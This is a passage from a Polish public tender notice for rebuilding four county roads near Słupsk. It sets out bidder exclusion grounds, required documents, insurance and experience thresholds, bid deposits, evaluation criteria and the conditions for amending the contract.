              </b><br /><div style="padding-left: 20px"><b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1  ustawy Pzp</b><br /><b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b>
                  tak
                  <br />
                  Zamawiający przewiduje następujące fakultatywne podstawy wykluczenia:
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 1 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 8 ustawy Pzp)
                <br /></div><b>
                III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI
              </b><br /><div style="padding-left: 20px"><b>
                  Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu
                </b><br />
                  tak
                <br /><b>
                  Oświadczenie o spełnianiu kryteriów selekcji
                </b><br />
                  nie
                </div><b>
                III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP:
              </b><br /><div style="padding-left: 20px">Każdy wykonawca w terminie 3 dni od dnia zamieszczenia na stronie internetowej informacji z otwarcia ofert o której mowa w art. 86 ust.5 ustawy, przekażą Zamawiającemu oświadczenie o przynależności lub braku przynależności do tej samej grupy kapitałowej, o której mowa w art. 24 ust. 1 pkt 23 ustawy. Wraz ze złożeniem oświadczenia, wykonawca może przedstawić dowody, że powiązania z innym wykonawcą nie prowadzą do zakłócenia konkurencji w postępowaniu o udzielenie zamówienia.  Wzór oświadczenia o przynależności lub braku przynależności do tej samej grupy kapitałowej, o której mowa w art. 24 ust. 1 pkt 23 Pzp stanowi załącznik nr 4 do niniejszej SIWZ Zamawiający przed udzieleniem zamówienia wezwie wykonawcę, którego oferta została najwyżej oceniona do złożenia w wyznaczonym terminie  nie krótszym niż 5 dni  aktualnych na dzień złożenia oświadczeń lub dokumentów: 2.Odpis z właściwego rejestru lub centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu potwierdzenia braku podstaw wykluczenia na podstawie art.24 ust.5 pkt 1 PZP wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. 3.zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzającego, że wykonawca nie zalega z opłacaniem podatków, wystawionego nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, lub innego dokumentu potwierdzającego, że wykonawca zawarł porozumienie z właściwym organem podatkowym w sprawie spłat tych należności wraz z ewentualnymi odsetkami lub grzywnami, w szczególności uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu; 4.zaświadczenie właściwej terenowej jednostki organizacyjnej Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego albo innego dokumentu potwierdzającego, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia społeczne lub zdrowotne, wystawionego nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, lub innego dokumentu potwierdzającego, że wykonawca zawarł porozumienie z właściwym organem w sprawie spłat tych należności wraz z ewentualnymi odsetkami lub grzywnami, w szczególności uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu; </div><b>
                III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP
              </b><br /><div style="padding-left: 20px"><b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b><br />Zamawiający przed udzieleniem zamówienia wezwie wykonawcę, którego oferta została
najwyżej oceniona do złożenia w wyznaczonym terminie  nie krótszym niż 5 dni  aktualnych na dzień złożenia oświadczeń lub dokumentów:
Dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie wprowadzonej działalności związanej z przedmiotem zamówienia na sumę gwarancyjną

sytuacji ekonomicznej lub finansowej;
Określenie warunku: Zamawiający uzna warunek za spełniony, jeżeli:
Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności   związanej z przedmiotem zamówienia na sumę gwarancyjną

dla zadania nr 1 : minimum 400.000,00 PLN 
Przebudowa drogi powiatowej nr 1170G na odcinku Lubuń- Żelkówko (gm.Kobylnica)

dla zadania nr 2: minimum 400.000,00 PLN
Przebudowa drogi powiatowej nr 1150G relacji Słonowiczki- Kczewo- Bzowo- Tychowo do granic administrac. powiatu słupskiego- etap II ( gm.Kobylnica) 

dla zadania nr 3: minimum 250.000,00 PLN
Przebudowa drogi powiatowej nr 1144G na odcinku Wykosowo do drogi wojewódzkiej nr 213 (gm.Główczyce)

dla zadania nr 4: minimum 200.000,00 PLN
Przebudowa drogi powiatowej nr 1181G Górzyno- Nieckowo (gm.Potęgowo)  

 Np. opłacona polisa z terminem ważności na okres realizacji zamówienia na w/w kwotę, a w przypadku jej braku inny dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na w/w kwotę.

2.dla zadania nr 1 Przebudowa drogi powiatowej nr 1170G na odcinku Lubuń- Żelkówko (gm.Kobylnica) 
 wykaz robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postepowaniu, a jeżeli okres prowadzenia działalności jest krótszy  w tym okresie,
co najmniej dwie roboty budowlane 
polegające na budowie lub przebudowie lub rozbudowie lub modernizacji dróg (ulic) publicznych  odpowiadające przedmiotowi zamówienia, każda o nawierzchni bitumicznej, każda o wartości brutto nie mniejszej niż 250.000,00zł,
lub jedna dot. roboty budowlanej
polegająca na budowie lub przebudowie lub rozbudowie lub modernizacji dróg (ulic) publicznych o nawierzchni bitumicznej, odpowiadająca przedmiotowi zamówienia, o wartości brutto nie mniejszej niż 500.000,00zł,
 wraz z podaniem ich rodzaju, wartości, daty, miejsca wykonania i podmiotów, na rzecz których roboty te zostały wykonane, z załączeniem dowodów określających czy te roboty budowlane zostały wykonane należycie, w szczególności informacji tym, czy roboty zostały wykonane zgodnie z przepisami prawa budowlanego i prawidłowo ukończone, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty wystawione przez podmiot, na rzecz którego roboty budowlane były wykonywane, a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze wykonawca nie jest w stanie uzyskać tych dokumentów  inne dokumenty. Wzór dokumentu stanowi złącznik nr 5 do niniejszej SIWZ
dla zadania nr 2 Przebudowa drogi powiatowej nr 1150G relacji Słonowiczki- Kczewo- Bzowo- Tychowo do granic administrac. powiatu słupskiego- etap II ( gm.Kobylnica)
 wykaz robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat przed upływem     terminu składania ofert albo wniosków o dopuszczenie do udziału w postepowaniu, a jeżeli okres    prowadzenia działalności jest krótszy  w tym okresie,
co najmniej dwie roboty budowlane 
polegające na budowie lub przebudowie lub rozbudowie lub modernizacji dróg (ulic) publicznych  odpowiadające przedmiotowi zamówienia, każda o nawierzchni bitumicznej, każda o wartości brutto            nie mniejszej niż 250.000,00zł,
lub jedna dot. roboty budowlanej
polegająca na budowie lub przebudowie lub rozbudowie lub modernizacji dróg (ulic) publicznych o nawierzchni bitumicznej, odpowiadająca przedmiotowi zamówienia, o wartości brutto nie mniejszej             niż 500.000,00zł,
 wraz z podaniem ich rodzaju, wartości, daty, miejsca wykonania i podmiotów, na rzecz których roboty te zostały wykonane, z załączeniem dowodów określających czy te roboty budowlane zostały wykonane należycie, w szczególności informacji tym, czy roboty zostały wykonane zgodnie z przepisami prawa budowlanego i prawidłowo ukończone, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty wystawione przez podmiot, na rzecz którego roboty budowlane były wykonywane, a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze wykonawca nie jest w stanie uzyskać tych       dokumentów  inne dokumenty. Wzór dokumentu stanowi złącznik nr 5 do niniejszej SIWZ
dla zadania nr 3 Przebudowa drogi powiatowej nr 1144G na odcinku Wykosowo do drogi wojewódzkiej nr 213 (gm.Główczyce)
 wykaz robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat przed upływem     terminu składania ofert albo wniosków o dopuszczenie do udziału w postepowaniu, a jeżeli okres    prowadzenia działalności jest krótszy  w tym okresie,
co najmniej dwie roboty budowlane 
polegające na budowie lub przebudowie lub rozbudowie lub modernizacji dróg (ulic) publicznych  odpowiadające przedmiotowi zamówienia, każda o nawierzchni bitumicznej, każda o wartości brutto  nie mniejszej niż 160.000,00zł,
lub jedna dot. roboty budowlanej
polegająca na budowie lub przebudowie lub rozbudowie lub modernizacji dróg (ulic) publicznych o nawierzchni bitumicznej, odpowiadająca przedmiotowi zamówienia, o wartości brutto nie mniejszej                           niż 320.000,00zł,
 wraz z podaniem ich rodzaju, wartości, daty, miejsca wykonania i podmiotów, na rzecz których roboty te zostały wykonane, z załączeniem dowodów określających czy te roboty budowlane zostały wykonane należycie, w szczególności informacji tym, czy roboty zostały wykonane zgodnie z przepisami prawa budowlanego i prawidłowo ukończone, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty wystawione przez podmiot, na rzecz którego roboty budowlane były wykonywane, a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze wykonawca nie jest w stanie uzyskać tych       dokumentów  inne dokumenty. Wzór dokumentu stanowi złącznik nr 5 do niniejszej SIWZ

dla zadania nr 4 Przebudowa drogi powiatowej nr 1181G Górzyno- Nieckowo (gm.Potęgowo)  
 wykaz robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat przed upływem     terminu składania ofert albo wniosków o dopuszczenie do udziału w postepowaniu, a jeżeli okres    prowadzenia działalności jest krótszy  w tym okresie,
co najmniej dwie roboty budowlane 
polegające na budowie lub przebudowie lub rozbudowie lub modernizacji dróg (ulic) publicznych  odpowiadające przedmiotowi zamówienia, każda o nawierzchni bitumicznej, każda o wartości brutto  nie mniejszej niż 125.000,00zł,
lub jedna dot. roboty budowlanej
polegająca na budowie lub przebudowie lub rozbudowie lub modernizacji dróg (ulic) publicznych o nawierzchni bitumicznej, odpowiadająca przedmiotowi zamówienia, o wartości brutto nie mniejszej                           niż 250.000,00zł,
 wraz z podaniem ich rodzaju, wartości, daty, miejsca wykonania i podmiotów, na rzecz których roboty te zostały wykonane, z załączeniem dowodów określających czy te roboty budowlane zostały wykonane należycie, w szczególności informacji tym, czy roboty zostały wykonane zgodnie z przepisami prawa budowlanego i prawidłowo ukończone, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty wystawione przez podmiot, na rzecz którego roboty budowlane były wykonywane, a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze wykonawca nie jest w stanie uzyskać tych       dokumentów  inne dokumenty. Wzór dokumentu stanowi złącznik nr 5 do niniejszej SIWZ
3.wykaz osób skierowanych przez wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowania robotami budowlanymi, tj. 
1 osobę przewidzianą do pełnienia funkcji Kierownika Budowy, 
posiadającą uprawnienia bez ograniczeń do kierowania robotami w zakresie zgodnym z przedmiotem zamówienia (specjalność drogowa), wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami. Wzór dokumentu stanowi załącznik nr 6 do niniejszej SIWZ
4.Oświadczenie, że osoba (y), która będzie uczestniczyć w wykonywaniu zamówienia, posiada wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień. Wzór dokumentu stanowi załącznik nr 7 do niniejszej SIWZ  

<br /><b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b><br /></div><b>
                III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP
              </b><br /><div style="padding-left: 20px"></div><b>
                III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6)
              </b><div style="padding-left: 20px">Do oferty- załącznik nr 1, Wykonawca musi dołączyć aktualne na dzień składania ofert oświadczenie, o którym mowa w art. 25a ust.1 ustawy Pzp, w zakresie wskazanym przez Zamawiającego potwierdzające, że wykonawca nie podlega wykluczeniu oraz spełnia warunki udziału w postępowaniu.  wzór oświadczeń stanowią załączniki nr 2 i 3 do niniejszej SIWZ. Informacje zawarte w oświadczeniach stanowią wstępne potwierdzenie, że wykonawca nie podlega wykluczeniu oraz spełnia warunki udziału w postępowaniu. Kosztorys ofertowy; Jeżeli upoważnienie do podpisania i złożenia oferty nie wynika ze złożonych dokumentów, do oferty dołączyć należy stosowne pełnomocnictwo w formie oryginału lub kserokopii poświadczonej notarialnie lub kopii potwierdzonej za zgodność z oryginałem przez osobę (y) udzielającą (-e) pełnomocnictwa;Pełnomocnictwo ustanawiającego Pełnomocnika - gdy ofertę składają wykonawcy wspólnie ubiegający się o udzielenie zamówienia publicznego - w formie oryginału albo kopii poświadczonej za zgodność z oryginałem przez notariusza, ustanawiające pełnomocnika do reprezentowania Wykonawców w postępowaniu o udzielenie niniejszego zamówienia albo reprezentowania i zawarcia umowy w sprawie zamówienia publicznego. Treść pełnomocnictwa powinna wskazywać rodzaj uprawnień, do których upoważniony jest Pełnomocnik, tj. np. podpisanie oferty, potwierdzenie za zgodność z oryginałem kopii dokumentów, składanie oświadczeń woli i wiedzy itp.;Zobowiązanie podmiotu trzeciego do oddania do dyspozycji niezbędnych zasobów na potrzeby realizacji zamówienia - jeżeli wykonawca dla wykazania spełniania warunków udziału w postępowaniu powołuje się na zasoby innych podmiotów;W przypadku wniesienia wadium w postaci niepieniężnej należy dołączyć oryginał dokumentu potwierdzającego wniesienie wadium, zaś w przypadku wniesienia wadium w formie pieniężnej zalecane jest dołączenie do oferty kopii potwierdzenia nadania przelewu. </div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA IV: PROCEDURA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>IV.1) OPIS </b><br /><b>IV.1.1) Tryb udzielenia zamówienia: </b>
                przetarg nieograniczony
              <br /><b>IV.1.2) Zamawiający żąda wniesienia wadium:</b><div style="padding-left: 20px">
                  tak,
                  <br />
                  Informacja na temat wadium
                  <br />Zamawiający żąda wadium w wysokości:
dla zadania nr 1: Przebudowa drogi powiatowej nr 1170G na odcinku Lubuń- Żelkówko (gm.Kobylnica)      
                            12.000,00 PLN (słownie: dwanaście tysięcy PLN).
dla zadania nr 2: Przebudowa drogi powiatowej nr 1150G relacji Słonowiczki- Kczewo- Bzowo- Tychowo do granic administrac. powiatu słupskiego- etap II ( gm.Kobylnica)         
                            12.000,00 PLN (słownie: dwanaście tysięcy PLN).
dla zadania nr 3: Przebudowa drogi powiatowej nr 1144G na odcinku Wykosowo do drogi wojewódzkiej nr 213 (gm.Główczyce)      
                             7.000,00 PLN (słownie: siedem tysięcy PLN).
dla zadania nr 4: Przebudowa drogi powiatowej nr 1181G Górzyno- Nieckowo (gm.Potęgowo)        
                             6.000,00 PLN (słownie: sześć tysięcy PLN).</div><br /><b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>
                IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /></div><br /><b>
                IV.1.5.) Wymaga się złożenia oferty wariantowej:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie oferty wariantowej
                <br />
                  nie
                <br />
                Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej:
                <br />
                  nie
                </div><br /><b>
                IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu
              </b><br /><i>
                (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne)
              </i><div style="padding-left: 20px">
                Liczba wykonawców  <br />
                Przewidywana minimalna liczba wykonawców  <br />
                Maksymalna liczba wykonawców  <br />
                Kryteria selekcji wykonawców:
                <br /></div><br /><b>
                IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów:
              </b><div style="padding-left: 20px">
                Umowa ramowa będzie zawarta:
                <br /><br />
                Czy przewiduje się ograniczenie liczby uczestników umowy ramowej:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych:
                <br />
                  nie
                <br />
                Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów:
                <br />
                  nie
                </div><br /><b>IV.1.8) Aukcja elektroniczna </b><br /><b>
                Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i>
                nie
              <br /><b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b><br /><b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b><br />
                nie
              <br />

              
                Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie  termin ich udostępnienia:
              
              <br />
              Informacje dotyczące przebiegu aukcji elektronicznej: 
              <br />
              Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): 
              <br />
              Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń:
              <br />
              Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: 
              <br />


              Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Aukcja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu:
                
                  nie
                <br />
                Warunki zamknięcia aukcji elektronicznej:
                <br /></div><br /><b>IV.2) KRYTERIA OCENY OFERT </b><br /><b>IV.2.1) Kryteria oceny ofert: </b><br /><b>IV.2.2) Kryteria</b><br /><div style="padding-left: 20px"><table><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena</td><td>60</td></tr><tr><td>okres gwarancji</td><td>40</td></tr></table></div><br /><b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony)
              <br />
                tak
              <br /><b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b><br /><b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b><br />
              Minimalne wymagania, które muszą spełniać wszystkie oferty:
              <br /><br />
              Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji
              
                nie
              <br />
              Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert:
              
                nie
              <br />
              Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów):
              <br /><br />
              Informacje dodatkowe
              <br /><br /><br /><b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b><br />
              Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu:
              <br /><br />
              Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody:
              <br /><br />
              Wstępny harmonogram postępowania:
              <br /><br />
              Podział dialogu na etapy w celu ograniczenia liczby rozwiązań:
              
                nie
              <br />
              Należy podać informacje na temat etapów dialogu:
              <br /><br /><br />
              Informacje dodatkowe:
              <br /><br /><b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b><br />
              Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty:
              <br /><br />
              Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia:
              <br />
                nie
              <br />
              Informacje dodatkowe:
              <br /><br /><b>IV.4) Licytacja elektroniczna  </b><br />
              Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna:
              <br /><div style="padding-left: 20px"></div>

              Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych:
              <br /><div style="padding-left: 20px"></div>

              Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień:
              <br /><div style="padding-left: 20px"></div>

              Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Licytacja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Wykonawcy, którzy nie złożyli nowych postąpień, zostaną  zakwalifikowani do następnego etapu:
                
                  nie
                </div>

              Termin otwarcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Termin i warunki zamknięcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div><br />
              Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy:
              <br /><div style="padding-left: 20px"></div><br />
              Wymagania dotyczące zabezpieczenia należytego wykonania umowy: 
              <br /><div style="padding-left: 20px"></div><br />
              Informacje dodatkowe:
              <br /><div style="padding-left: 20px"></div><b>IV.5) ZMIANA UMOWY</b><br /><b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b>
                tak

                <br />
                Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian:
                <br />Zamawiający zgodnie z art. 144 ustawy PZP przewiduje możliwość wprowadzenia zmian do treści zawartej umowy Załączniku nr 8 do SIWZ w następujących przypadkach: 
zmiany przepisów prawnych, w tym zmiany stawki od podatku od towarów i usług mającej
zastosowanie do przedmiotu umowy, 
wydania decyzji, postanowień lub innych aktów organów administracji publicznej bądź instytucji
kontrolujących działania Zamawiającego mających wpływ na wykonanie przedmiotu umowy, o ile
okoliczności powodują konieczność zmiany wysokości, wartości lub sposobu spełnienia
świadczeń stron, 
termin zakończenia przedmiotu umowy może ulec zmianie wyłącznie z przyczyn niezawinionych i niezależnych od Wykonawcy takich jak:
występują warunki pogodowe uniemożliwiające prowadzenie robót - silne opady deszczu lub śniegu  a także utrzymująca się temperatura poniżej 5°C udokumentowana pomiarami wykonanymi na budowie i potwierdzonymi wpisem do dziennika budowy przez Wykonawcę oraz Inspektora Nadzoru, zgłoszone pisemnie przez Wykonawcę wraz z potwierdzeniem zasadności przez Inspektora Nadzoru,
nastąpiła konieczność przeprowadzenia badań archeologicznych, które wstrzymują możliwość
robót budowlanych,
stwierdzono obecność niewybuchów, które stwarzają niebezpieczeństwo dla życia,
wstrzymano roboty za względu na roszczenia osób trzecich do własności gruntu lub innych
nieruchomości, 
nastąpiło wstrzymanie prac przez pracowników organów państwowych zgodnie z obowiązującym
prawem ,

Na wniosek Wykonawcy Zamawiający może zgodzić się na przedłużenie terminu wykonania zamówienia o czas opóźnienia, jeżeli takie opóźnienie będzie miało wpływ na wykonanie przedmiotu umowy w przypadku:
konieczności  wykonania badań archeologicznych
szczególnie niesprzyjających warunków atmosferycznych, które nie były możliwe do przewidzenia,
działania siły wyższej mającej wpływ na termin wykonania zamówienia, (np. działanie sił przyrody  huragan, powódź, pożar; stan wojenny, stan wyjątkowy itp.)
termin realizacji może ulec zmianie w przypadku konieczności wykonania robót dodatkowych niezbędnych do właściwego wykonania przedmiotu umowy, a których nie można było przewidzieć w terminie jej zawarcia (data zawarcia umowy).
Ponadto Zamawiający zgodnie z art. 144 ustawy PZP przewiduje możliwość wprowadzenia zmian 
do treści zawartej umowy w następującym zakresie zmiany osób wskazanych przez Wykonawcę do
pełnienia funkcji: 
osoba posiadająca uprawnienia budowlane do prowadzenia robót objętych przedmiotem zamówienia
w zakresie:
1) branży drogowej z doświadczeniem zawodowym na stanowisku kierownika
budowy
Zamawiający dopuszcza możliwość zmiany inspektora nadzoru.
sposobu spełnienia świadczenia na skutek zmian technologicznych spowodowanych w szczególności następującymi okolicznościami: 
niedostępność na rynku materiałów lub urządzeń wskazanych w dokumentacji projektowej lub specyfikacji technicznej wykonania i odbioru robót spowodowania zaprzestania produkcji lub wycofaniem z rynku tych materiałów lub urządzeń,
pojawienie się na rynku materiałów lub urządzeń nowszej generacji pozwalających na
zaoszczędzenie kosztów realizacji przedmiotu umowy lub kosztów eksploatacji wykonanego
przedmiotu umowy, 
pojawienie się nowszej technologii wykonania zaprojektowanych robót pozwalających na 
zaoszczędzeniu czasu realizacji inwestycji lub kosztów wykonanych prac, jak również kosztów 
eksploatacji wykonanego przedmiotu umowy, 
konieczność zrealizowania projektu przy zastosowaniu innych rozwiązań
technicznych/technologicznych niż wskazane w dokumentacji projektowej lub specyfikacji
technicznej wykonania i odbioru robót, w sytuacji, gdyby zastosowanie przewidzianych rozwiązań
groziło niewykonaniem lub wadliwym wykonaniem przedmiotu umowy, 
Inne przesłanki do wprowadzenia zmian do  treści zawartej umowy: 
W przypadku konieczności wykonania robót nieprzewidzianych lub zamiennych, a niezbędnych do wykonania przedmiotu umowy zgodnie ze sztuką budowlaną i zasadami wiedzy technicznej.
Zmiany dotyczące sposobu wykonania robót budowlanych, technologii wykonania robót lub rozwiązań technicznych i materiałowych nie przewidzianych w umowie   w przypadku, w którym służyć  to będzie podniesienie standardu przedmiotu zamówienia lub zmiany te będą korzystne dla Zmawiającego i nie będzie to wykraczało poza określenie przedmiotu zamówienia zawartego w SIWZ ani nie zwiększy wynagrodzenia Wykonawcy.
W żadnym wypadku postanowień klauzuli pkt 20.6. nie należy interpretować jako udzielenie
dowolnej ze stron roszczenia do żądania zmiany umowy, a jedynie jako możliwość dokonania
zmiany umowy. 
Zgodnie z art.144 Pzp zakazuje się zmian postanowień zawartej umowy  w stosunku do treści oferty, jednakże zamawiający na wypadek powstałych w/w okoliczności związanych z możliwością konieczności  wykonania robót nieprzewidzianych lub zamiennych, a niezbędnych do wykonania przedmiotu umowy zgodnie ze sztuką budowlaną i zasadami wiedzy technicznej po przeanalizowaniu możliwości finansowych dopuści i rozliczy zgodnie z art.144 ust.1 pkt 6) wykonanie przedmiotowych robót niezbędnych, których łączna wartość zmian jest mniejsza niż kwoty określone w przepisach wydanych na podst. art.11 ust.8 i jest mniejsza od 15% wartości zamówienia określonej pierwotnie w umowie w przypadku zamówień na roboty budowlane.    
Każda zmiana umowy musi być dokonana na piśmie w formie aneksu pod rygorem nieważności
oraz wymaga zgody drugiej strony. 
 Strony nie będą ponosiły żadnej odpowiedzialności za częściowe lub całkowite nie wywiązanie się ze zobowiązań umownych spowodowanych przypadkami siły wyższej. Przez siłę wyższą rozumie się wszelkie wydarzenia, których nie można było przewidzieć przy podpisywaniu umowy spowodowane wyjątkowymi okolicznościami, takimi jak: pożar, powódź, trzęsienie ziemi i inne kataklizmy przyrodnicze mające charakter siły wyższej. 
Strona poszkodowana przez siłę wyższą jest zobowiązana do bezzwłocznego poinformowania na
piśmie drugiej strony o jej wystąpieniu. W przypadku niespełnienia tego obowiązku, strona  
zainteresowana traci prawo do powoływania się na siłę wyższą. 
Po zakończeniu trwania siły wyższej, druga strona powinna być o tym natychmiast poinformowana.
<br /><b>IV.6) INFORMACJE ADMINISTRACYJNE </b><br /><br /><b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i><br /><br /><b>Środki służące ochronie informacji o charakterze poufnym</b><br /><br /><b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b><br />
              Data: 17/05/2017, godzina: 09:00,
              <br />
